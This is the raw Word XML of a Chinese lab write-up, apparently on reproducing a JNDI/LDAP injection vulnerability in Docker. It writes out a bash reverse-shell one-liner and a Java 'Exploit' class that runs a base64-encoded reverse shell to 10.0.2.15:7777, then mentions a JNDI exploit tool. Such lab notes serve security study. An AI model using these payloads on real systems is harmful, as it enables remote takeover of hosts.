      <w:r w:rsidR="00DD3EE4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E88F331" w14:textId="28890F84" w:rsidR="00DD3EE4" w:rsidRDefault="00DD3EE4" w:rsidP="00DD3EE4">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后续测试了很多，包括直接在主机运行Exploit都是可用的，但是搬到docker上就会失败。使用下列代码在docker上自己运行也能成功反弹shell，但是使用LDAP就不能成功。目前判断可能和java有关。但是网络上确实有人能成功反弹。总而言之是很奇怪的事。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01343196" w14:textId="5ADCDBDC" w:rsidR="00DD3EE4" w:rsidRDefault="00DD3EE4" w:rsidP="00DD3EE4">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AE3B34C" w14:textId="528BE22C" w:rsidR="00DD3EE4" w:rsidRDefault="00DD3EE4" w:rsidP="00DD3EE4">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码如下：</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD3EE4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bash -c 'bash -i &gt;&amp; /dev/tcp/10.0.2.15/7777 0&gt;&amp;1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301B81BD" w14:textId="44D23B32" w:rsidR="00D26FDF" w:rsidRDefault="00D26FDF" w:rsidP="00DD3EE4">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java文件：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C625262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>import java.lang.Runtime;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FF6966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>import java.lang.Process;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7B21D4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>public class Exploit {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCDAF8F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public Exploit(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D4F05F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try{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321623E3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Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjIuMTUvNzc3NyAwPiYxJw==}|{base64,-d}|{bash,-i}");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166B77DC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               }catch(Exception e){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E1F5D5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                           e.printStackTrace();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA0CE15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                            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0EF66F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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B10F570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public static void main(String[] argv){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A49FEE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        Exploit e = new Exploit();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9849EB" w14:textId="77777777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 xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D75DCBE" w14:textId="3F58C21E" w:rsidR="00DD3EE4" w:rsidRPr="00DD3EE4" w:rsidRDefault="00DD3EE4" w:rsidP="00DD3EE4">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD3EE4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2492EBF8" w14:textId="77777777" w:rsidR="00940261" w:rsidRDefault="00940261" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C230271" w14:textId="4CF52719" w:rsidR="00940261" w:rsidRDefault="00DD3EE4" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>虽然没有成功反弹shell，但是可以确定成功访问了攻击者的服务器，至少可以确定漏洞是存在的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B515EC" w14:textId="77777777" w:rsidR="00DD3EE4" w:rsidRDefault="00DD3EE4" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A92969F" w14:textId="77777777" w:rsidR="00DD3EE4" w:rsidRDefault="00DD3EE4" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D8C2A8D" w14:textId="77777777" w:rsidR="00003A32" w:rsidRDefault="00003A32" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37D7A80B" w14:textId="77777777" w:rsidR="00003A32" w:rsidRDefault="00003A32" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BD7233B" w14:textId="77777777" w:rsidR="00003A32" w:rsidRDefault="00003A32" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F60A222" w14:textId="77777777" w:rsidR="00003A32" w:rsidRDefault="00003A32" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="355CCA30" w14:textId="77777777" w:rsidR="00003A32" w:rsidRDefault="00003A32" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05B8EA20" w14:textId="1938DC01" w:rsidR="00DD3EE4" w:rsidRDefault="00DD3EE4" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第二种办法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2545BD7E" w14:textId="77777777" w:rsidR="00DD3EE4" w:rsidRDefault="00DD3EE4" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2018AB8B" w14:textId="16306A15" w:rsidR="00DD3EE4" w:rsidRDefault="00003A32" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用JNDI漏洞利用脚本工具</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA99153" w14:textId="77777777" w:rsidR="00003A32" w:rsidRDefault="00003A32" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0120E5B6" w14:textId="0E7F0F96" w:rsidR="00003A32" w:rsidRPr="00003A32" w:rsidRDefault="00003A32" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一图展示结果：成功。需要注意的是必须使用生成提供的漏洞文件路径。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708F035A" w14:textId="1B97058F" w:rsidR="00003A32" w:rsidRDefault="00003A32" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00003A32">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BBD1006" wp14:editId="316C6371">
            <wp:extent cx="5274310" cy="2985135"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="1397472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2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EE95" w14:textId="00557A86" w:rsidR="00003A32" w:rsidRDefault="00003A32" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13F6607F" w14:textId="5285859A" w:rsidR="000101DD" w:rsidRDefault="000101DD" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17DD6EE0" w14:textId="77777777" w:rsidR="000101DD" w:rsidRDefault="000101DD" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10D2B052" w14:textId="77777777" w:rsidR="000101DD" w:rsidRPr="00A41217" w:rsidRDefault="000101DD" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="000101DD" w:rsidRPr="00A412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49"/>
    <w:rsid w:val="000002BF"/>
    <w:rsid w:val="00003A32"/>
    <w:rsid w:val="000101DD"/>
    <w:rsid w:val="00081B49"/>
    <w:rsid w:val="000B77E0"/>
    <w:rsid w:val="00100609"/>
    <w:rsid w:val="00114B1A"/>
    <w:rsid w:val="00173563"/>
    <w:rsid w:val="00317AAD"/>
    <w:rsid w:val="004B1FA8"/>
    <w:rsid w:val="005A2121"/>
    <w:rsid w:val="005D67F3"/>
    <w:rsid w:val="005E48B0"/>
    <w:rsid w:val="0076170E"/>
    <w:rsid w:val="00777B51"/>
    <w:rsid w:val="00796CB6"/>
    <w:rsid w:val="00934327"/>
    <w:rsid w:val="00940261"/>
    <w:rsid w:val="00A41217"/>
    <w:rsid w:val="00B47E54"/>
    <w:rsid w:val="00B9116E"/>
    <w:rsid w:val="00C14A76"/>
    <w:rsid w:val="00CB5BA6"/>
    <w:rsid w:val="00D210AE"/>
    <w:rsid w:val="00D26FDF"/>
    <w:rsid w:val="00DC1535"/>
    <w:rsid w:val="00DD3EE4"/>
    <w:rsid w:val="00E9659A"/>
    <w:rsid w:val="00F7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5AD67"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{05CFB1C9-79D9-4AD5-87EC-6B5FBF9B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77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6CB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96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github.com/mbechler/marshalsec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6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博韬 方</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>博韬 方</cp:lastModifiedBy>
  <cp:revision>11</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-08-25T13:21:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-09-01T07:12:00Z</dcterms:modified>
</cp:coreProperties>
</file>